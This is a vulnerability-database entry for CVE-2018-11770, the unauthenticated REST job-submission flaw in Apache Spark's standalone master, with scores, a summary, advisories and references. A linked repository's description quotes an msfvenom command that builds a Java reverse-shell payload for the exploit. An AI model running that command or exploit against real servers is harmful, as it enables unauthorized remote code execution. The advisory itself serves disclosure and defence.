Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
4.2
CVSSv3

CVE-2018-11770

Published: 13/08/2018 Updated: 10/02/2023
CVSS v2 Base Score: 4.9 | Impact Score: 4.9 | Exploitability Score: 6.8
CVSS v3 Base Score: 4.2 | Impact Score: 2.5 | Exploitability Score: 1.6
VMScore: 436
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:N
Subscribe to Apache

Vulnerability Summary

From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 'false'.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache spark

Vendor Advisories

Red Hat: CVE-2018-11770
From version 130 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit In standalone, the config property 'sparkauthenticatesecret' establishes a shared secret for authenticating requests to submit jobs via spark-submit However, the REST API does not use th ...

Github Repositories

https://github.com/ivanitlearning/CVE-2018-11770

Python RCE exploit for Apache Spark rewritten from Metasploit module

CVE-2018-11770 Apache Spark Unauthenticated Reverse Shell RCE Standalone Python 3 RCE exploit for Apache Spark rewritten from this Metasploit module Exploit POC explained here The exploit code itself is explained here Tested with Python 37 on this target Usage: root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# msfvenom -p java/shell_reverse_tcp LHOST=19216892134 LPORT=4444

References

CWE-287https://spark.apache.org/security.html#CVE-2018-11770http://www.securityfocus.com/bid/105097https://lists.apache.org/thread.html/bd8e51314041451a2acd720e9223fc1c15a263ccacb396a75b1fc485%40%3Cdev.spark.apache.org%3Ehttps://nvd.nist.govhttps://github.com/ivanitlearning/CVE-2018-11770https://access.redhat.com/security/cve/cve-2018-11770
CVSSv3
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-30924CVE-2024-3400overflowCVE-2024-23528CVE-2024-21338CVE-2024-3818CVE-2024-23535NULL pointer dereferenceelevation of privilege
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook